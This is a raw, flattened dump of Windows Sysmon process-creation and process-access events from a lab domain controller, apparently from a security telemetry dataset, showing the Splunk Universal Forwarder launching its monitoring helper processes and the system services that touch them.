AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:16.062{08A6967A-481B-6000-4C05-000000009A01}66326708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:17.640{08A6967A-481D-6000-4E05-000000009A01}67606624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:17.484{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-481D-6000-4E05-000000009A01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:17.484{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:17.484{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:17.484{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:17.484{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:17.484{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-481D-6000-4E05-000000009A01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:17.484{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-481D-6000-4E05-000000009A01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:17.485{08A6967A-481D-6000-4E05-000000009A01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.984{08A6967A-481E-6000-5005-000000009A01}66086588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.828{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-481E-6000-5005-000000009A01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.828{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.828{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.828{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.828{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.828{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-481E-6000-5005-000000009A01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.828{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-481E-6000-5005-000000009A01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.828{08A6967A-481E-6000-5005-000000009A01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.312{08A6967A-481E-6000-4F05-000000009A01}66126324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.156{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-481E-6000-4F05-000000009A01}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.156{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.156{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.156{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.156{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.156{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-481E-6000-4F05-000000009A01}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.156{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-481E-6000-4F05-000000009A01}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:18.157{08A6967A-481E-6000-4F05-000000009A01}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:20.203{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4820-6000-5105-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 